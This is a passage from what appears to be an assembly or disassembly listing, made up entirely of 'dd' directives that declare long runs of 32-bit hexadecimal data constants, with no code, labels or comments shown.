		dd 91E2C227h, 20A435D0h, 0CBA4B805h, 486F51B7h,	0BDB1ED0h
		dd 58F458B1h, 0C161197Ch, 730D50F5h, 0E0A26A54h, 753FEF33h
		dd 74437F94h, 0D2F2345Ch, 0A83327EFh, 95069B4Dh, 5E193131h
		dd 89321B06h, 0DBAE46D5h, 0A77F54C3h, 4761B2D1h, 0D37F7BE7h
		dd 36B01C5h, 0CDB80BFAh, 1A8A2B8Fh, 38F68A38h, 3BF3589Bh
		dd 0BBEF340Dh, 0EA5FFB52h, 0E54C61BFh, 9C082E8h, 0E77E2041h
		dd 0AF530CC4h, 0DB3780FAh, 0BB251D84h, 269C0903h, 0B013F8A4h
		dd 0D1E42520h, 53C7C19Eh, 0DC798135h, 87FA15E9h, 0B452B401h
		dd 7CB9E1CAh, 0C0C9767Dh, 0F0019284h, 0A3D1892Fh, 0F9D79ABDh
		dd 4C71672Dh, 0CCF329B1h, 9025808Ch, 80825A3Dh,	15C902Eh
		dd 88AFDB55h, 0CA9C2B12h, 0D7E8967Dh, 23C6B140h, 83FF1F0h
		dd 4FFEF45h, 0C2593D81h, 52EE5266h, 9C7203FFh, 9F60BEE7h
		dd 3F9314E1h, 49D1299h,	3951B2B6h, 626551C3h, 958155C6h
		dd 6C1970FCh, 0D3153246h, 6FA62D4Eh, 895706D1h,	0F7557A2h
		dd 185419E2h, 4DD58754h, 0C5EA46B1h, 745CEAD0h,	0A08B31A8h
		dd 4C79663Bh, 602929BCh, 6718A34Ah, 891A28DBh, 97713E68h
		dd 3144F83Fh, 0C137582h, 0C9877AF6h, 0F46801D6h, 9E5743F7h
		dd 9803507Eh, 0FF1FE5C4h, 0BC0441B5h, 371DF6CFh, 1355214Bh
		dd 2CCC9970h, 24ADEA9Fh, 682F529Ch, 0A4F1510Ch,	0BAE8B8E2h
		dd 60339BC6h, 5D2D316Ch, 57A3371Ah, 9B6C6A69h, 653457E9h
		dd 0FB4C58BCh, 4E65A3A3h, 0A630E819h, 8A28680Dh, 0E8455E3Eh
		dd 0B518E5C6h, 9D1BFF71h, 294CBE64h, 90241D02h,	306B0537h
		dd 0DBEF718Eh, 0FDBABB98h, 5500754Eh, 10FA0BFAh, 16D157Dh
		dd 37099AB3h, 6E404C76h, 5C81338Ah, 0F11865C3h,	0ED778206h
		dd 0E19090B1h, 780400BEh, 1179D530h, 29A94DE3h,	11D5C687h
		dd 2051DF41h, 11232957h, 0A5AA0FA7h, 0C7C7B45Fh, 54590CA1h
		dd 0E4171C2Eh, 0BBD639CAh, 5017E81Ch, 98D815CDh, 0EE706F11h
		dd 6A984EE6h, 0A1BBA546h, 0F52CE973h, 57DFA529h, 0D65EC74Eh
		dd 0DAC7C534h, 0F70AA62h, 8C7A7A01h, 6E6E7739h,	8BBA3918h
		dd 1069FE26h, 93E09C9h,	17D1A950h, 0AA0A0A49h, 87EF2FADh
		dd 0D9F3686h, 0F8656F5h, 0CAB20ACEh, 4BFEC35Ch,	2FF86D20h
		dd 0C5003AEBh, 1F935390h, 2DF7054Ch, 767AF0BAh,	175F171Eh
		dd 11EE2CDh, 0F7C8D941h, 106C7205h, 0D135EDFEh,	6BA41BEEh
		dd 0A73D807h, 60D92974h, 4386758Bh, 0DEBD4B45h,	21D6F129h
		dd 0F169EAA1h, 9EBE8EA5h, 0A47F1C9Ah, 0A5B5AFB3h, 0E4F0220Bh
		dd 0F0AE4D12h, 0EEB8DFE4h, 0B21E5AA5h, 9EC7C735h, 0F174A1B8h
		dd 318AD660h, 0E3C6CB06h, 7D6DBB81h, 0AFF92A0Eh, 0A463D8A9h
		dd 0B083B7B1h, 495D325Ah, 0AD53BBE5h, 386B692Eh, 0E1530A34h
		dd 80D1F72Bh, 0F0ACCE93h, 7E54C0D7h, 5610F645h,	87576F45h
		dd 9CC7A90Ch, 0ACA7F303h, 0D30CCFD6h, 32040E57h, 69990C44h
		dd 748619DFh, 0CB893A33h, 3BDDF340h, 88D0F8E3h,	0D098198Ah
		dd 0A39C47ECh, 0BAF913E8h, 1DA0A4B4h, 5505A181h, 718E5AA0h
		dd 14BD77A7h, 9403D052h, 920A119Eh, 335EDB45h, 0AF90A1C2h
		dd 12137F88h, 532DEE2Ch, 37E891BCh, 8B1358C5h, 6813D301h
		dd 9168CC19h, 520218B3h, 0E5856688h, 2E6A4590h,	9BBE6408h
		dd 43DDF54Ah, 4A2F3313h, 0CAFCFB56h, 2660A9DFh,	0CAB85C26h
		dd 2D140290h, 0AB1C0D44h, 0A787C1C1h, 0EABF99AAh, 0AA845AEDh
		dd 666C2988h, 341C2164h, 0BF3606EEh, 45A25CADh,	525D8308h
		dd 23ABA905h, 87604808h, 0A5A2A95Eh, 0E0AE774Eh, 2EE9B00Bh
		dd 4DE8C412h, 15562D17h, 0C13D0E44h, 572039E0h,	9C1115B4h
		dd 0FF1AAE0Fh, 7722D74Ch, 5D578102h, 3E68C2BFh,	0D2184F51h
		dd 292AD0D4h, 5FF0E5DDh, 19DD2DA1h, 0FF06C031h,	283A0195h
		dd 0E7D49405h, 61857194h, 60B1B660h, 1045A719h,	1503A8BAh
		dd 0BB12AEE8h, 6814EE3Ch, 80D4102Ch, 0B376BE4Dh, 1431A942h
		dd 2802C680h, 2BB88A62h, 50D11804h, 0D72A4297h,	0B744676Ch
		dd 7C30A924h, 6FE3659h,	0D5420F19h, 0D2B34051h,	90105D1Dh
		dd 66204B44h, 11C558AFh
		dd 36590629h, 9C5D40h, 0D3406996h, 3D345412h, 0B44CC15Bh
		dd 1860BD50h, 0A8790484h, 0C142EC21h, 7221220h,	0C0CE820Dh
		dd 0AF45C14Ch, 0CCD262E6h, 37D4154Dh, 0D5A306B6h, 0D1EEB30h
		dd 0E16D0474h, 0DC2368C6h, 0EF0AB177h, 1DE17B76h, 0C762EADFh
		dd 56CE81A5h, 5EA3EF47h, 0F576A5E8h, 4989DAA5h,	0E8C39D59h
		dd 8F2A97C2h, 6EED2588h, 0D83AE36Bh, 8F5DD536h,	2F071938h
		dd 0E64F0A60h, 0A163AB85h, 611817A7h, 5A0CF8D8h, 1CEBE3C8h
		dd 1CA0D8B3h, 0D9AD42D1h, 0F3505CF5h, 0E79E1F8Bh, 91C48306h
		dd 18F0F09Eh, 413D7A5Eh, 5D3E28C6h, 383228Eh, 0C2FA02D3h
		dd 44F23087h, 0B0FEAEDAh, 11818Eh, 0E1508BEFh, 0B8867C5Fh
		dd 21688C2Fh, 8D5D927Ah, 0E72DD00Ch, 8C2F53AEh,	9C3265A1h
		dd 22CC2D1Ch, 18EA8D30h, 0C5AAB4DCh, 9015AA61h,	8C030601h
		dd 0FB3F5617h, 60420F32h, 5D2E0CBFh, 8A6FB16Eh,	7E072CA2h
		dd 0C40B4025h, 57284718h, 0B0881A59h, 935BAC3Fh, 0B380287Ah
		dd 0CEABA046h, 0DE141B6Ah, 44E69F9Eh, 1F855329h, 0B649BA7Ah
		dd 8C95C0AEh, 25656315h, 305D1660h, 3682F6C2h, 2B070388h
		dd 546313EEh, 309A33D7h, 2B2EABD3h, 6CD4E022h, 3BE0A36Dh
		dd 205A7A2Ch, 0A259EEB0h, 0AEBD3502h, 0CE2AB359h, 0B303A38Ch
		dd 6E3535D6h, 75143CD7h, 2659D7F3h, 605F4DDFh, 59E48DECh
		dd 0ACF0BF84h, 73AA7E64h, 0CE61B981h, 4598CFBh,	418F4B2Ch
		dd 27860786h, 0ACBF28ABh, 0F1C012A0h, 91AFA0B9h, 0F6C7E14Ah
		dd 214D0943h, 0FD58F2E0h, 9545CB2Ah, 0CB3E004Bh, 42A23288h
		dd 33014322h, 487E0C28h, 326B8124h, 3AAA17F6h, 9644ACACh
		dd 6518002Bh, 9047CAA2h, 65DBA63Ch, 49EBFEDCh, 98306672h
		dd 18829599h, 0A0BC5AADh, 959BA2B4h, 0B411145Eh, 78A1F6ACh
		dd 4AB8B83h, 6A8BEDD8h,	0E939F8BCh, 228A6CACh, 0EB2EA886h
		dd 0BBFF99A0h, 1778441Eh, 948392FFh, 1FA0C7A2h,	7046D0CCh
		dd 807A9442h, 0B8539EE1h, 82A2E12Ah, 575A26F6h,	0AADB1457h
		dd 4499562Ah, 6EFDF904h, 305CFB4Eh, 28C71532h, 0E523EAA7h
		dd 0F5B6B7CDh, 4B5D01B6h, 0AB5F18BBh, 59B724ABh, 0DE0DF865h
		dd 0C61A5AACh, 0EEEA05ECh, 0F9C51F46h, 94F7AB4Dh, 44A5501Fh
		dd 3119945Bh, 5B3C7C14h, 0B071013Eh, 0A9335346h, 4AB72D9Fh
		dd 0C83144E2h, 0CBF01DC2h, 5A2D2279h, 52F6F6A4h, 0A4154D1Fh
		dd 5F18BE30h, 0F60061AAh, 220B7E92h, 59B4E455h,	0ABE3100Eh
		dd 0D2107D63h, 0EBD114A5h, 3686C0B1h, 6224DAA1h, 26044691h
		dd 1AEB8E30h, 786064B1h, 99CDD67h, 8BE84926h, 0BBB0BA06h
		dd 5555C7ECh, 9055D52Ch, 23BF0D0Fh, 98D36A67h, 0FEC905F5h
		dd 8DB47E46h, 1A4C8A7Dh, 4B5A3671h, 0B8ED3B19h,	203BC7BDh
		dd 2BE4E4A8h, 260DB484h, 3AB8B56Ch, 1807E55Dh, 0F90846F2h
		dd 398B3B82h, 18BA4809h, 3378B76Ch, 2B3AF500h, 149E8700h
		dd 0B3310BF0h, 2ACCC16Dh, 74FA6557h, 0E8824703h, 6BC430D3h
		dd 655C1505h, 0F70D23CFh, 21F88836h, 19199283h,	0CD867DCEh
		dd 4E2E1D21h, 16DF9749h, 0D4CC7B04h, 0FA245C51h, 4416C074h
		dd 0DD4C050h, 0FAD04424h, 0D80E0C6Eh, 35A4D8B8h, 0AA8DAF24h
		dd 8F41CA73h, 0BFE2422Fh, 0AE91752Ah, 0C328E27Dh, 0C9DF3B44h
		dd 8CF1CC65h, 6AEC320h,	0BE3B35E3h, 0E43E970Ch,	3F05A8EAh
		dd 6E0070F4h, 0CC2A158h, 76AC671Bh, 0E099FE00h,	680C2184h
		dd 809F502Ah, 7FE97D44h, 0E5D4D1B0h, 0D423BE24h, 60433A3Eh
		dd 350D7FA3h, 0DC1FD23Fh, 5724A2E8h, 54DFC419h,	5190C68Ah
		dd 0FBC97905h, 180E3ACEh, 0EA4ADA59h, 6D372B2Bh, 0BBEF72FEh
		dd 0C8C0C188h, 36153F6Ch, 60395459h, 940F7A2Dh,	8FB08843h
		dd 5B988A8Eh, 0E7802DEBh, 46F20CC4h, 0A68CB3E0h, 308C2607h
		dd 0E020B9E2h, 0CD00B2Dh, 9D2EAFB9h, 2F8A4755h,	0A558660h
		dd 0F2049DA8h, 0E05A673Ah, 8EE1EB8Ah, 0E76AD404h, 32C77C2Bh
		dd 926398BEh, 0CCC1F96Ch, 472E303Eh, 931D1722h,	2FB30AB8h
		dd 8CA3CA86h, 680BC701h, 9CAB39CDh, 0C52F57C8h,	35D4B0B4h
		dd 7485BE08h, 0A836BBAAh, 7004CAD1h, 0E931D491h, 45C69829h
		dd 9D57420h, 80A53358h,	0A805D035h, 0EED1B044h,	94109518h
		dd 2AD21288h, 498AF4E5h, 12485B84h, 48F76F1h, 7011891Ah
		dd 6A0F6097h, 0DC442240h, 8E409193h, 687F4829h,	0A44C0EE3h
		dd 0B04AF755h, 9B7C8624h, 260AE4E2h, 54D4C443h,	0F1579BEBh
		dd 0E34E541Bh, 0CBF85B80h, 867755Ch, 0E670051Fh, 47323977h
		dd 0BEE8128Bh, 39530CA4h, 0AAB6AD9Dh, 381056C6h, 100C2229h
		dd 4D73B54Ch, 388A9A5Dh, 0AD8B225Ah, 15948A1Eh,	5B46A6DCh
		dd 6E8BDB8Dh, 1E7EC1F1h, 3BB7BB29h, 9DE92AEAh, 0B1F5A10Bh
		dd 0F4427E30h, 799186B4h, 51DF2EBCh, 67BD302Ch,	0F70069C2h
		dd 115045BAh, 8C44B7B5h, 88FCB933h, 3117D6A3h, 95F7F284h
		dd 0AA353102h, 15768155h, 0BDD262BFh, 2D80C58Ah, 8C44B662h
		dd 12B0FD4Ah, 9FB3675Dh, 95DB5024h, 414C8451h, 0CF742F4Fh
		dd 0EFBF1F43h, 0BAC49EE2h, 0E7C4C087h, 7C49A8C5h, 0A6606E92h
		dd 0EB74AFE2h, 33617AE2h, 846224B4h, 92B2A916h,	0E0C1C151h
		dd 36BA8ED2h, 4343DDCEh, 3F40E538h, 83432459h, 95D05938h
		dd 9A89F285h, 73A4DF66h, 6ED5E409h, 0A83AD8C7h,	71113763h
		dd 1EE2B63Fh, 19C49733h, 9CE2AA5Fh, 525C5CECh, 923D9860h
		dd 1413E296h, 9BC06836h, 7A58978Ch, 8405AF96h, 42221736h
		dd 0A3807240h, 2E8F368Ch, 0CA6D2659h, 0EC94E98Dh, 0CC1D3A28h
		dd 656D85FBh, 666B54EDh, 0CE0F768Ch, 0A9303F7Fh, 42918561h
		dd 54381EAAh, 378E180Ch, 0A6037906h, 0F3292549h, 2CDAA0C3h
		dd 0A5686B0h, 0BF2C3D8Ch, 29535D9Bh, 0B03EC4C1h, 0ABDA1598h
		dd 1AB4154h, 65B5CBC6h,	0A059460Dh, 5C518356h, 0F3D58E54h
		dd 28F13F8h, 0F8BFF5C2h, 0A4667E15h, 6C4E4A00h,	8A331936h
		dd 0A7717728h, 0F7C02801h, 371B2C6Eh, 4AAC032Dh, 0C1C6E52Eh
		dd 3D8861D5h, 0EAA76581h, 2CA7A2E6h, 771B0F2h, 8539AC02h
		dd 0D528EF05h, 25D892Ah, 0AE246275h, 85679844h,	5F18D3C5h
		dd 0C699D851h, 15DCA579h, 88E92D05h, 1AD38E46h,	0BFC15998h
		dd 0A01C5901h, 89D91706h, 1A072055h, 0C6BEFBF4h, 0ED32C02Fh
		dd 0D7167EAAh, 0E3818F1Fh, 0EB5F9323h, 2E0EE5F7h, 0D9388184h
		dd 782A4AA2h, 1F7FF51Ch, 138D8B7Dh, 0DD23B084h,	746AD28Ch
		dd 387FE156h, 0A5B83550h, 8CCA1280h, 4C6003E6h,	1FCB40BAh
		dd 841A7309h, 798A1370h, 4F5AE0CFh, 49175141h, 9D568D3Eh
		dd 0B7242BC7h, 0AA713DFDh, 28FC60EEh, 2843990Fh, 0E9916820h
		dd 68991342h, 340984D3h, 0D318244Dh, 472E9304h,	41A4993Ch
		dd 0C4AAB7C0h, 712B23D6h, 4CB588F5h, 0CC5D023Dh, 269B442Bh
		dd 34A8A771h, 0AD508B60h, 3E382287h, 7DB5F7A2h,	0DC05EAE7h
		dd 0AF64320Bh, 44298F62h, 8FDD5308h, 237E4B80h,	0CEF3B773h
		dd 0DE6AB813h, 79702F22h, 57A51BBAh, 0E16D36E7h, 9A4D94C4h
		dd 9C9A0BCBh, 0AB7555ADh, 0EADE228Eh, 15AC2616h, 3037665Dh
		dd 4BD471Ah, 0CD19AC13h, 8EA8BA9Ah, 1957A123h, 0F476A2A8h
		dd 0D0EA4FEAh, 4D5AE432h, 0A228F407h, 0B9859FC9h, 0EBA8EA31h
		dd 6A7DB805h, 0A0186E41h, 10E3FCD4h, 0C5F6B024h, 96464805h
		dd 0D439AC0Bh, 0FFE92131h, 510AE9BEh, 98150575h, 68727222h
		dd 2DB1F748h, 0ABAA5618h, 0CBDF7EBDh, 128B8812h, 0CA87F731h
		dd 8428DFF2h, 9652BD68h
		dd 9E42C68Eh, 0C0B0026Eh, 0EB32B896h, 0C29BEB68h, 91D5DA9Ah
		dd 0AA41564Bh, 512FE11Ah, 730C9167h, 860C2A09h,	0D07C4971h
		dd 0BBF53AADh, 0B610D530h, 66F8786Fh, 5AA875E5h, 2B336949h
		dd 0CC1B1682h, 539F6690h, 8F9917D8h, 7098148Ch,	0BA9542F6h
		dd 1904DE24h, 13818CEFh, 6E60CEAEh, 9F370956h, 0C3E13AE9h
		dd 6F5CAD9Bh, 827F8957h, 0AB662D46h, 7112FACBh,	0F697703Fh
		dd 0D5D13B7Dh, 863687E5h, 0A330645Eh, 5B4860F5h, 7B85C424h
		dd 3EB802AFh, 0DEC45404h, 143FB43Eh, 0D1963EF8h, 0C2460657h
		dd 85D24574h, 182A3508h, 0CAD00AB3h, 41B318E8h,	54552C2Ah
		dd 0C5854B5Bh, 9E9654B8h, 72E8D517h, 994852C1h,	0C581BA8Dh
		dd 6B0D1D5Dh, 8D88C430h, 191FE75Ch, 377EFAh, 607E010Ch
		dd 8A2A1EE4h, 0D1DC3ED6h, 14978D5Ah, 0BE7C83AFh, 662F1D2h
		dd 92935310h, 0CB428EC0h, 2851BFC5h, 4781A642h,	5C5A12CBh
		dd 7CAB75ACh, 0F0298717h, 0A92281ECh, 0F782C7D6h, 0E5E8BF4h
		dd 0D75A38FCh, 617828BEh, 0FBC88B7Ch, 4C42F60Eh, 72EA5EF8h
		dd 0BBDD5EB9h, 0CA817D62h, 0E68584C1h, 20AE9D74h, 9EAB117Bh
		dd 778C4AD0h, 0EE9C651h, 780A824Ch, 0E2D1CC09h,	3D731158h
		dd 0D20A4B69h, 0A4DC9DC6h, 0DB682733h, 0C4911C0Bh, 255D60A5h
		dd 0E76EEE38h, 0C4C14A3Bh, 0A215B337h, 301253F6h, 7D89E7DEh
		dd 109A18CBh, 8D137F6Fh, 0A1643425h, 7DB6A5C5h,	0EFCF29D4h
		dd 8C0C0BB0h, 41E75A2Ch, 9A667691h, 54382C71h, 0DC1F5FC6h
		dd 863E52FBh, 21384647h, 0E446916Eh, 9CE441D7h,	94F413h
		dd 0A9763911h, 17AEF02Ah, 0CA5F9EC8h, 1CDF085Eh, 5B63FB50h
		dd 5D60C2FAh, 0F623B84Fh, 0F3B4D4FBh, 26275C0Fh, 89A2E6B1h
		dd 0FE81276Bh, 3AEC0310h, 0C147A15Dh, 0D883D176h, 0CA821818h
		dd 0C570B3ACh, 0BE1D555Eh, 0BB8D25Bh, 0E9D8F8EDh, 2EC208Fh
		dd 7F4E18ACh, 0E47739C6h, 4964AE1Bh, 0C20772ABh, 0DF4B05A6h
		dd 0DB27D1C0h, 0CFC9461Dh, 72E63B4Bh, 5ED5F8BBh, 362C5DBFh
		dd 7195D9C2h, 559689B4h, 36B1041Ah, 8ED20E2h, 0BCEA86D2h
		dd 76981C4Fh, 0A9E05085h, 840F0F65h, 0B54E928Fh, 718C0126h
		dd 8108127h, 7272488Bh,	0B0ED24B0h, 0C9EC0DFh, 1D654BE3h
		dd 5953B751h, 9C5D42E4h, 0DA38D99Ah, 0A9726178h, 970169CBh
		dd 0DB1B5109h, 2C34D1BEh, 381185ECh, 242F557Eh,	1774C904h
		dd 0F07F3503h, 8B3EA50h, 0A030B694h, 7A220448h,	6E8B30F4h
		dd 0D8A27EBDh, 8083166Bh, 46828D41h, 3AB7E089h,	0D8E9329Ch
		dd 536A8ECEh, 12699C54h, 0B60A67F9h, 6F10247h, 5051BF0Fh
		dd 56BD1962h, 0C56ECE45h, 3238CC2Eh, 90978AA8h,	904603Ah
		dd 0F622275Bh, 8CB68500h, 3BB0708Dh, 30672477h,	97B7757Ah
		dd 66D813h, 351B44CCh, 0A4558020h, 68C8472Ah, 9A004442h
		dd 0B80D632h, 0D2546513h, 2A00699Ch, 74AE5B47h,	0FB5579A8h
		dd 22A82962h, 9574EDA5h, 6616B833h, 6A30B291h, 0CA9F2F41h
		dd 33741D19h, 82B4AEEDh, 2E90F6CCh, 27BB7EF3h, 9ABB2051h
		dd 0E525051Bh, 19C3A85Dh, 0C835236Ch, 0A3CD52CCh, 47610316h
		dd 0DB4DC2C3h, 0FF450149h, 0E6ACA6B7h, 0C631CE30h, 1D312D99h
		dd 0C5153009h, 819D6240h, 40533D59h, 50665119h,	0D2907C33h
		dd 0A463077h, 3606487Eh, 7281DF1Ch, 4B17CB53h, 2AE81913h
		dd 0B4468DD8h, 0A7C3D4E9h, 0B7947467h, 0AD7D8675h, 76509224h
		dd 801210F7h, 341E25AEh, 0B1692889h, 0EEE613EFh, 34B473E9h
		dd 31BE3228h, 39DD519Ch, 28DB7280h, 6CA46058h, 9C940A13h
		dd 2178F533h, 0BC7B0FEAh, 0CF391A3Dh, 57B5A499h, 3BED003Bh
		dd 0F63742EBh, 3D72334h, 16EF7B8Ch, 0E4265934h,	0E130D9F0h
		dd 0AE056B01h, 891531ABh, 6270C630h, 63284CDDh,	0BCF51605h
		dd 7ACEA3CAh, 25C7A631h, 0ED18C9F8h, 0D1E9F20h,	0DE58F827h
		dd 1D6AA3ABh, 11505F1Ah, 32301216h, 0D8482002h,	0FAE0CA0Ah
		dd 0B32E880Ch, 0DE61AC41h, 98893631h, 60FE1832h, 3A8C603Bh
		dd 41AA619Dh, 1B35F20h,	2F0D5E0Ah, 0D307E646h, 0B90AFE02h
		dd 654685A3h, 96A85BB8h, 0C023872Fh, 7A753EFFh,	0ACCCDB50h
		dd 0BC7AD23Eh, 22FA4020h, 3AED1902h, 477EE147h,	48C7D269h
		dd 378B6986h, 126B5F89h, 0C7488205h, 9C1C8C69h,	65646B15h
		dd 0CC19BD48h, 0F85D5168h, 3068293Bh, 1912B773h, 4CC6A2E2h
		dd 0C2BA5151h, 5B05445Eh, 4D1CD8D9h, 229B7882h,	1C1C8CDEh
		dd 0B4C6F28Dh, 0B61005FFh, 84B2B52Eh, 33079F46h, 0F9416B68h
		dd 80C656C5h, 68F6BD39h, 0B1CFBAC7h, 0D4AEDF74h, 0D9756EEDh
		dd 61015655h, 66708087h, 0D257AEB4h, 6B410ABBh,	0B9595B13h
		dd 44B2F6FEh, 0DC352140h, 7E86BAE8h, 0D14EB11Eh, 12504907h
		dd 34A2E402h, 32C94842h, 0CF5C2093h, 4480A7C5h,	4B00766Bh
		dd 0BB06104Bh, 2A0455FFh, 558C9AFAh, 0CD4631Dh,	6A285278h
		dd 540184B4h, 89743034h, 22D846B0h, 0A22644E6h,	0D222444Ch
		dd 3708D116h, 13A86D11h, 45BCB711h, 444D89BCh, 484889Fh
		dd 2C97422Dh, 9222A514h, 35881116h, 12B04D11h, 4589B511h
		dd 113689D0h, 26992260h, 0C758088Bh, 1F20D69Ch,	0F84BC34Dh
		dd 40220561h, 0CED4B36Fh, 46AF7300h, 11AA8DB4h,	0C46A236Eh
		dd 0A11A48DBh, 0C4463236h, 6B11748Dh, 0DD049723h, 36C1A448h
		dd 93EF68B2h, 8081A14h,	66662064h, 3AE95514h, 0F578AEB2h
		dd 6B0E6771h, 0F3FFF09Dh, 0E301553Eh, 683231C6h, 1593EEA3h
		dd 0D58C624h, 122F4BA4h, 8EB6EAD8h, 143C87D5h, 495F567Eh
		dd 0C6271EB0h, 0FFA10607h, 0D021F7C0h, 29D080F2h, 9DAA04B4h
		dd 8D385ADAh, 0DE341ECFh, 6346943Bh, 517FC722h,	90204261h
		dd 58EE24B0h, 0ECF46E12h, 99B49F4Eh, 0E8B1A1DBh, 4A831E11h
		dd 0C60222D1h, 5A093E9h, 328508DCh, 9325E49Ch, 9EFC8D9Dh
		dd 0F48699A6h, 3C905D4h, 5E62D502h, 487B82C7h, 0CC432B92h
		dd 8AC80728h, 84D0302Ah, 446B6194h, 17749515h, 1CEF54E8h
		dd 0A5C4B6DAh, 73393BCh, 0A0B9812Ch, 0BB988A9Dh, 322953Ah
		dd 9BE9326h, 5EA208C2h,	0A3862EF9h, 90EF8D8h, 0B6AD73CCh
		dd 78506340h, 31BBE18Fh, 7DA35E46h, 0B3D3C2ACh,	28E0BDE9h
		dd 8462A228h, 77CCC0Ah,	977F067Fh, 0F380019Bh, 0E599D62Eh
		dd 50C51175h, 0BB1D07F3h, 564B3E8Eh, 70B484B3h,	3A116FAh
		dd 5F783272h, 968D41FEh, 42AD2FAAh, 4966E425h, 5227E5D8h
		dd 65DC3111h, 7A851967h, 9CDDD1EEh, 0EB860CADh,	0E48F1CDCh
		dd 5F7B13DBh, 709E258Dh, 908FCA01h, 1279115Bh, 6446B02Ch
		dd 9D953B47h, 943081A9h, 24DC0049h, 0A0460931h,	0D58C1726h
		dd 2F970F58h, 6D50F5ABh, 40A958C4h, 0D6A26425h,	0CADC8C25h
		dd 0F0CA32C6h, 8759C8F6h, 0D1C4C773h, 0AAA1652h, 271184ABh
		dd 18CA9147h, 963ED73h,	0EC62FAE9h, 0C8AF1B26h,	0B4E20A5Eh
		dd 0D817D8DCh, 5B462EE2h, 0C9836780h, 2071C622h, 58C21069h
		dd 0A208281Ah, 12FC9AD7h, 0D8E4CC9Eh, 1F974FADh, 0C093BE8Eh
		dd 4F1B44D4h, 0A2E2DA3Fh, 0DFD32C71h, 570CBE95h, 31F0958Bh
		dd 389CA75Ah, 541063h, 0D86565DAh, 5D7424BCh, 2C213033h
		dd 0B45A794Ah, 0C0BD4C7Ch, 0B502E421h, 2A008800h, 1B3572F0h
		dd 0C26042ACh, 7E974DF4h, 59F248A7h, 41D0BC0Eh,	0E61168BDh
		dd 0FCA61479h, 6B4FC5ECh, 26673EC4h, 0EB37158Bh, 0A5331C3Bh
		dd 6076565Ch, 0EBE40B5Ch, 96FDB624h, 0D042E2F3h, 831938F7h
		dd 67D54BFCh, 0C7156CA6h
		dd 2A6EC7EAh, 2F0B1F5h,	0C3EBDD2Ah, 0B0E3993Eh,	662957AEh
		dd 63B9CC4Bh, 8B3D7511h, 0EB3F235Bh, 0CFB3CF92h, 3B9B9CBEh
		dd 4AA6F63Dh, 18A5DEE2h, 0E6E42978h, 78C73C8Fh,	0A0CC8F8Bh
		dd 17DCCE5Ah, 2E167D65h, 32FEC7BFh, 0C6EBF5D2h,	0AC84710Ch
		dd 451A9173h, 7125F95Eh, 0C1455422h, 118A0B13h,	74E85621h
		dd 2E503E37h, 0D35EB05Eh, 8CCCF76Ch, 7F23E5D3h,	153F19DCh
		dd 73D72A98h, 1AA7F5B7h, 44D3B659h, 737288D4h, 6A3E80FEh
		dd 0B209C8AAh, 29A4B414h, 27C5CB17h, 0BEE5A9BBh, 0A8251720h
		dd 82522496h, 14DA261h,	0A82F003Bh, 2C118544h, 21E5E589h
		dd 1D885204h, 0BA1E360Bh, 0F961180Ch, 0FC8F0608h, 0F86715C5h
		dd 6454D37Eh, 0E6E8A03Eh, 32661F25h, 6941C7BBh,	26404165h
		dd 42EB03FAh, 0F1DB48BFh, 211701B3h, 92ACE349h,	64205F06h
		dd 0EB4CB1D8h, 9A6E2A72h, 7D16F938h, 44BE2301h,	0D520BACh
		dd 0DC68F21Ah, 7D730BA4h, 0FB084D52h, 9A01087Eh, 5ABB096Ah
		dd 0E62CF819h, 64059B8Bh, 92824109h, 0A89C987h,	182B18Ch
		dd 9B9D4AAEh, 0D9BF24A2h, 7972F22Eh, 66CB5CCDh,	0DA821883h
		dd 2A7D188Fh, 0C24CC6FFh, 5C1A3CBBh, 4638BBD1h,	72591F0Ch
		dd 0F1152CB0h, 1BFFA328h, 0AA985EA8h, 57510503h, 9181D091h
		dd 0D10882E5h, 411C8112h, 0CC7D1496h, 4A61228Ah, 5660A381h
		dd 8BDA1562h, 594F905Ah, 0ECC1EB12h, 422E5165h,	9617DF4Ah
		dd 25B958A5h, 8B2C3810h, 2E6EADB8h, 422E5CB2h, 0CB232396h
		dd 0DB46C5CBh, 836F7460h, 746B78D7h, 48231F02h,	0BA77C406h
		dd 57173DE8h, 0B60640B4h, 2371048Bh, 2B03285h, 1F857E19h
		dd 4213287Eh, 1F950663h, 43E04232h, 0CAA2D177h,	0FB5F523Bh
		dd 1F7D8C54h, 8BBEA410h, 0AECC8DD6h, 7AC93443h,	312D6E3Bh
		dd 5B045352h, 0F7509F3Dh, 1F0EC9FEh, 0A89057C6h, 31ABFFCEh
		dd 11B825D0h, 47D15015h, 925FBC19h, 0A9AE054Ch,	2F098456h
		dd 4E00B143h, 9AFB144h,	3B0954CEh, 70B709CAh, 2DAAD29Bh
		dd 75BD3809h, 1ECE918Dh, 82A40453h, 28E232E9h, 1E941568h
		dd 43C8108h, 659D4A16h,	158F74A0h, 0FAC5475Dh, 2900F9F6h
		dd 0B4E70E6h, 3BD05189h, 0EA257240h, 1576066h, 1B7BB888h
		dd 0F715918h, 4D020902h, 86232808h, 0DBE86F81h,	8E9BC409h
		dd 78F667C1h, 78EB78AFh, 90309401h, 4818F144h, 8CD11DFh
		dd 6D501B3Fh, 0E7F08085h, 15062295h, 8845FB2Dh,	8962301Bh
		dd 0A65F4B0Dh, 0D4A4768Eh, 0A20A3EB6h, 4192916Bh, 196159A5h
		dd 5DB8260Bh, 0C495E4E5h, 7437D955h, 0B81534h, 0D4EABA34h
		dd 0EBABBE10h, 4A651251h, 621224EDh, 9E96025h, 2832F99Fh
		dd 651113ACh, 2D83EA7Fh, 0AC577609h, 0D4311F99h, 44AE9344h
		dd 7945BBDBh, 0F66CB175h, 17DEC5F0h, 0E5A3E2E9h, 2062B8FCh
		dd 73087AEBh, 2264BE07h, 0DFD8DC7Ch, 0BCCC0828h, 4B042461h
		dd 0EFF9EFBFh, 57C5573Bh, 173EA162h, 0E4280D18h, 2086E597h
		dd 8AC2E0F8h, 68B3710h,	4BF2B654h, 9C12AC68h, 2656634h
		dd 0FDE60B6Dh, 0FA0CAB3Eh, 2525A2B8h, 0FE648911h, 3AE03A8Fh
		dd 126540C8h, 5D8C92CAh, 0B160F27Ch, 1101E2CCh,	0CF268570h
		dd 0E55C35C6h, 4A4C1BEFh, 0FA40814h, 31001F02h,	8ECC1525h
		dd 691D6123h, 0FB29ACC8h, 0C6CA30C8h, 0C5E98C0Ch, 0B8211DF8h
		dd 0D2382581h, 2450E4B0h, 38030CF0h, 4AEED239h,	0A8EAC86Ah
		dd 0CAFE6612h, 148165D6h, 89210DBDh, 2912701h, 0D1DD415Eh
		dd 9BB4F3B5h, 52884563h, 1A41C8Eh, 8ABAD13Ah, 87DDC0F2h
		dd 50FDCD7Ch, 7C560446h, 586053D7h, 1638A818h, 0DB58494Dh
